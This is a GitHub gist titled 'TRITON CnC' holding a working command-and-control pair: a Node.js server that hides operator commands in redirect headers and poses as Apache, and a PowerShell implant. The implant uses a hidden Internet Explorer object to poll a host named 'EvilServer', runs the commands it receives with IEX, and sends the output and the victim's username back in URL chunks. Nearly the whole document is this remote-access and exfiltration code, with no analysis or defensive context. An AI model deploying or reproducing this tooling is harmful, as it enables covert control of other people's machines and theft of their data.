Created
April 5, 2017 15:52
-
-
Save ssherei/0504fb041f8e4c0f4b7f3854481fdfcf to your computer and use it in GitHub Desktop.
TRITON CnC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var http = require('http'); | |
| var readline = require('readline'); | |
| var fs = require('fs'); | |
| var command = 'Nocmd'; | |
| const PORT=8000; | |
| var count = 0; | |
| var filebuf; | |
| const split = 20; | |
| var remainder; | |
| var repeat; | |
| var filelength; | |
| var chunkcount= 0; | |
| var filecmd = 0; | |
| var log = fs.createWriteStream('log.txt', {'flags': 'a'}); | |
| function handleRequest(request, response){ | |
| if (count == 0) { | |
| console.log('\r\nrecieved Connection from : ' + request.connection.remoteAddress + '\r\n'); | |
| rl.setPrompt('CnC-'+request.connection.remoteAddress+' > '); | |
| } | |
| count = count +1; | |
| if (request.url == '/') { | |
| if (command.indexOf('Invoke-Script') > -1) { | |
| filecmd = 1; | |
| chunkcount = 0; | |
| var file = command.split(' ')[1]; | |
| filebuf = fs.readFileSync(file); | |
| length = filebuf.length; | |
| repeat = Math.floor(length/split); | |
| remainder = length % split; | |
| var total; | |
| if(remainder) { | |
| total = repeat + 1; | |
| } | |
| else { | |
| total = repeat; | |
| } | |
| buf = new Buffer('chunk-'+total); | |
| } | |
| else { | |
| buf = new Buffer(command, 'utf8'); | |
| } | |
| cmd = buf.toString('hex'); | |
| response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/', | |
| 'Content-Type': 'text/html; charset=UTF-8', | |
| 'Content-Length': '0', | |
| 'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1', | |
| } | |
| ); | |
| response.end(); | |
| command = 'Nocmd'; | |
| } | |
| else if (request.url == '/getchunk'){ | |
| buf = filebuf.slice(chunkcount*split,chunkcount*split+split); | |
| cmd = buf.toString('hex'); | |
| console.log(cmd); | |
| chunkcount = chunkcount + 1; | |
| response.writeHead(302,'Found',{Location: 'http://'+cmd+'.c/', | |
| 'Content-Type': 'text/html; charset=UTF-8', | |
| 'Content-Length': '0', | |
| 'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1', | |
| } | |
| ); | |
| response.end(); | |
| command = 'Nocmd'; | |
| } | |
| else { | |
| filecmd = 0; | |
| response.writeHead(302,'Found',{Location: 'http://Nocmd.c/', | |
| 'Content-Type': 'text/html; charset=UTF-8', | |
| 'Content-Length': '0', | |
| 'Server': 'Apache/2.4.18 (Debian) mod_python/3.3.1 Python/2.7.11+ OpenSSL/1.0.2g mod_perl/2.0.9 Perl/v5.22.1', | |
| } | |
| ); | |
| response.end(); | |
| log.write('\r\n'+decodeURI(request.url)+'\r\n'); | |
| console.log('\r\n'+decodeURI(request.url)+'\r\n'); | |
| } | |
| } | |
| var server = http.createServer(handleRequest); | |
| server.listen(PORT, function(){ | |
| //Callback triggered when server is successfully listening. Hurray! | |
| //console.log("Server listening on: http://localhost:%s", PORT); | |
| }); | |
| var rl = readline.createInterface(process.stdin, process.stdout); | |
| rl.setPrompt('CnC> '); | |
| rl.prompt(); | |
| rl.on('line', function(line) { | |
| if (line === "quit") rl.close(); | |
| command = line; | |
| rl.prompt(); | |
| }).on('close',function(){ | |
| log.end('end'); | |
| process.exit(0); | |
| }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $IE=new-object -com internetexplorer.application; | |
| $IE.Silent; | |
| $url = "EvilServer"; | |
| $w = IEX whoami; | |
| function ExecCommand($command) { | |
| $string = IEX $command 2>&1 | out-string; | |
| write-host $string; | |
| $len = $string.Length; | |
| $split = 1500; | |
| $repeat=[Math]::Floor($len/$split); | |
| for($i=0;$i-lt$repeat;$i++){ | |
| $str = $string.Substring($i*$Split,$Split); | |
| $IE.navigate($url+$w+'-'+$str); | |
| Start-Sleep -s 1; | |
| }; | |
| if($remainder=$len%$split){ | |
| $str = $string.Substring($len-$remainder); | |
| $IE.navigate($url+$w+'-'+$str); | |
| }; | |
| } | |
| function decodeCommand($command) { | |
| $command = $command -Split '\.'; | |
| $command = $command[0]; | |
| $cmd = for($i=0; $i -lt $command.Length;$i+=2) { [char][int]::Parse($command.substring($i,2),'HexNumber')}; | |
| $command = $cmd -join ''; | |
| return $command; | |
| } | |
| while ($true) { | |
| $IE.navigate($url); | |
| $command = $IE.Document.url -Split '/'; | |
| $command = $command[2]; | |
| $command = decodeCommand($command); | |
| write-host $command; | |
| if($command -Like'Nocmd') { | |
| Start-Sleep -s 2; | |
| continue; | |
| } | |
| elseif($command -like'chunk*'){ | |
| $c =''; | |
| $command = $command -split '-'; | |
| $cnt = $command[1]; | |
| $IE.navigate($url+'getchunk'); | |
| for($i=0;$i -lt $cnt; $i++) { | |
| Start-Sleep -s 1; | |
| $IE.navigate($url+'getchunk'); | |
| $cmd = $IE.Document.url -Split '/'; | |
| $cmd = $cmd[2]; | |
| write-host $cmd; | |
| $cmd = decodeCommand($cmd); | |
| write-host $cmd; | |
| $c = $c + $cmd | |
| } | |
| write-host $c; | |
| ExecCommand($c); | |
| } | |
| else { | |
| write-host 'Exec'; | |
| ExecCommand($command); | |
| Start-Sleep -s 2; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment